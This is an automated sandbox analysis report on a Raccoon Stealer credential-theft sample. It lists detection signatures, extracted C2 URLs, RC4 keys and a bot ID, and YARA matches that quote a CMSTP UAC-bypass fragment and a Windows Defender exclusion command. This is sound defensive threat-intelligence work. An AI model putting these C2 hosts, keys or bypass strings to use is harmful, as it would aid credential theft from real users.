Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qpwx2wT5ky.exe

Overview

General Information

Sample Name:qpwx2wT5ky.exe
Analysis ID:562520
MD5:c22c0fdbc19dcd4838709bbaca921f56
SHA1:4cd9280315ce4ff97cdb95d7dd6d8fcb7715f292
SHA256:d72ff8708ffeb9a95f559828938dc1439884e7c224579127418e285b1aa1d235
Tags:exeRaccoonStealer
Infos:

Detection

Raccoon
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Raccoon Stealer
Antivirus detection for URL or domain
Writes to foreign memory regions
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to steal Internet Explorer form passwords
Allocates memory in foreign processes
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Moves itself to temp directory
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • qpwx2wT5ky.exe (PID: 6428 cmdline: "C:\Users\user\Desktop\qpwx2wT5ky.exe" MD5: C22C0FDBC19DCD4838709BBACA921F56)
    • LaunchWinApp.exe (PID: 5980 cmdline: C:\Windows\SysWOW64\LaunchWinApp.exe MD5: 529B7E6E938EA6C3BCA2821EB525BBD7)
      • WerFault.exe (PID: 5952 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5980 -s 796 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"RC4_key2": "5611095ee49218feb5b751c501370b8c", "C2 url": ["http://188.166.1.115/hdm3prapor", "http://91.219.236.139/hdm3prapor", "http://194.180.174.147/hdm3prapor", "http://185.3.95.153/hdm3prapor", "http://185.163.204.22/hdm3prapor", "https://t.me/hdm3prapor"], "Bot ID": "79e83b057f17f4dd954bc4809f7290094846fc1f", "RC4_key1": "jY1aN3zZ2j"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
      00000002.00000000.308435428.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
        00000002.00000000.308435428.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_RaccoonRaccoon stealer payloadditekSHen
        • 0x7e47c:$s1: inetcomm server passwords
        • 0x86f44:$s4: CredEnumerateW
        • 0x7e048:$s5: %[^:]://%[^/]%[^
        • 0x7e064:$s6: %99[^:]://%99[^/]%99[^
        • 0x7b050:$s8: m_it.object_iterator != m_object->m_value.object->end()
        • 0x7d728:$x1: endptr == token_buffer.data() + token_buffer.size()
        • 0x7d0e8:$x2: \json.hpp
        • 0x7da34:$x3: Microsoft_WinInet_
        • 0x7db44:$x3: Microsoft_WinInet_
        • 0x7db44:$x4: Microsoft_WinInet_*
        00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
          Click to see the 29 entries
          SourceRuleDescriptionAuthorStrings
          0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x8ee04:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x8ee60:$e2: Add-MpPreference -ExclusionPath
              0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMDDetects Windows exceutables bypassing UAC using CMSTP utility, command line and INFditekSHen
              • 0x903e3:$s1: c:\windows\system32\cmstp.exe
              • 0x9017f:$s2: taskkill /IM cmstp.exe /F
              • 0x9003b:$s5: RunPreSetupCommands=RunPreSetupCommandsSection
              • 0x90271:$s6: "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
              0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOMDetects executables embedding command execution via IExecuteCommand COM objectditekSHen
              • 0x8ebd2:$r1: Classes\Folder\shell\open\command
              • 0x8ec16:$k1: DelegateExecute
              • 0x8ead2:$s1: /EXEFilename "{0}
              • 0x8eaf8:$s2: /WindowState ""
              • 0x904e6:$s2: /WindowState ""
              • 0x8eb22:$s3: /PriorityClass ""32"" /CommandLine "
              • 0x9050c:$s3: /PriorityClass ""32"" /CommandLine "
              • 0x8eb6e:$s4: /StartDirectory "
              • 0x90558:$s4: /StartDirectory "
              • 0x8eb94:$s5: /RunAs
              • 0x9057e:$s5: /RunAs
              Click to see the 77 entries
              No Sigma rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: qpwx2wT5ky.exeVirustotal: Detection: 47%Perma Link
              Source: qpwx2wT5ky.exeMetadefender: Detection: 23%Perma Link
              Source: qpwx2wT5ky.exeReversingLabs: Detection: 66%
              Source: Yara matchFile source: 2.2.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.468cf00.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.LaunchWinApp.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.468cf00.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308435428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308711684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.309062654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308140277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.320185486.000000000468C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.467738406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.309415722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.467293779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: qpwx2wT5ky.exe PID: 6428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: LaunchWinApp.exe PID: 5980, type: MEMORYSTR
              Source: http://185.163.204.22/hdm3praporAvira URL Cloud: Label: malware
              Source: http://188.166.1.115/hdm3praporAvira URL Cloud: Label: malware
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00410327 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,CryptUnprotectData,2_2_00410327
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0040E6DD __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,2_2_0040E6DD
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0040CB3A __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,2_2_0040CB3A
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00428EC4 CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,2_2_00428EC4
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00434EB9 lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,2_2_00434EB9
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00429097 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,2_2_00429097
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0040F186 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,CryptUnprotectData,2_2_0040F186
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0040D1A3 __EH_prolog,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,CryptUnprotectData,2_2_0040D1A3
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0041FC20 __EH_prolog,_strlen,CryptStringToBinaryA,2_2_0041FC20

              Exploits

              barindex
              Source: Yara matchFile source: 0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.31bbfc0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.3170000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.qpwx2wT5ky.exe.45615b0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.qpwx2wT5ky.exe.4615610.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.3170000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.qpwx2wT5ky.exe.4615610.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.301171439.0000000004615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: qpwx2wT5ky.exe PID: 6428, type: MEMORYSTR
              Source: qpwx2wT5ky.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: qpwx2wT5ky.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ktmw32.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: nsi.pdb_ source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: winnsi.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485613034.0000000005725000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shell32.pdb source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.473103575.00000000053B3000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: userenv.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: iphlpapi.pdbe source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: winhttp.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: profapi.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: sechost.pdb source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: nsi.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdbf source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: webio.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485613034.0000000005725000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ole32.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msasn1.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485613034.0000000005725000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: sechost.pdbk source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernelbase.pdb source: WerFault.exe, 00000010.00000002.502132177.0000000002F52000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: c:\TFS\DevDiv\OC-CT-Main23Rel-Dev14\src\src\Waverton\Cct.Contracts.Public\obj\VS140\Release\Release\Microsoft.VisualStudio.WindowsAzure.Contracts.2.3.pdb source: qpwx2wT5ky.exe
              Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485613034.0000000005725000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: crypt32.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004604F2 FindFirstFileExW,2_2_004604F2
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0043F85B FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,2_2_0043F85B
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0043615F __EH_prolog,GetLogicalDriveStringsA,2_2_0043615F

              Networking

              barindex
              Source: TrafficSnort IDS: 2034960 ET TROJAN Win32.Raccoon Stealer Checkin M6 194.180.174.147:80 -> 192.168.2.3:49814
              Source: Malware configuration extractorURLs: http://188.166.1.115/hdm3prapor
              Source: Malware configuration extractorURLs: http://91.219.236.139/hdm3prapor
              Source: Malware configuration extractorURLs: http://194.180.174.147/hdm3prapor
              Source: Malware configuration extractorURLs: http://185.3.95.153/hdm3prapor
              Source: Malware configuration extractorURLs: http://185.163.204.22/hdm3prapor
              Source: Malware configuration extractorURLs: https://t.me/hdm3prapor
              Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
              Source: global trafficHTTP traffic detected: GET /hdm3prapor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 188.166.1.115
              Source: global trafficHTTP traffic detected: GET /hdm3prapor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 188.166.1.115
              Source: global trafficHTTP traffic detected: GET /hdm3prapor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 194.180.174.147
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 159.223.25.220
              Source: Joe Sandbox ViewIP Address: 188.166.1.115 188.166.1.115
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 23:12:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
              Source: unknownTCP traffic detected without corresponding DNS query: 188.166.1.115
              Source: unknownTCP traffic detected without corresponding DNS query: 188.166.1.115
              Source: unknownTCP traffic detected without corresponding DNS query: 188.166.1.115
              Source: unknownTCP traffic detected without corresponding DNS query: 188.166.1.115
              Source: unknownTCP traffic detected without corresponding DNS query: 188.166.1.115
              Source: unknownTCP traffic detected without corresponding DNS query: 188.166.1.115
              Source: unknownTCP traffic detected without corresponding DNS query: 188.166.1.115
              Source: unknownTCP traffic detected without corresponding DNS query: 188.166.1.115
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.139
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.139
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.139
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.139
              Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.147
              Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.147
              Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.147
              Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.147
              Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.147
              Source: unknownTCP traffic detected without corresponding DNS query: 159.223.25.220
              Source: unknownTCP traffic detected without corresponding DNS query: 159.223.25.220
              Source: unknownTCP traffic detected without corresponding DNS query: 159.223.25.220
              Source: unknownTCP traffic detected without corresponding DNS query: 159.223.25.220
              Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.147
              Source: unknownTCP traffic detected without corresponding DNS query: 159.223.25.220
              Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.147
              Source: unknownTCP traffic detected without corresponding DNS query: 159.223.25.220
              Source: WerFault.exe, 00000010.00000002.503229027.0000000005329000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.500486218.0000000005329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: Amcache.hve.16.drString found in binary or memory: http://upx.sf.net
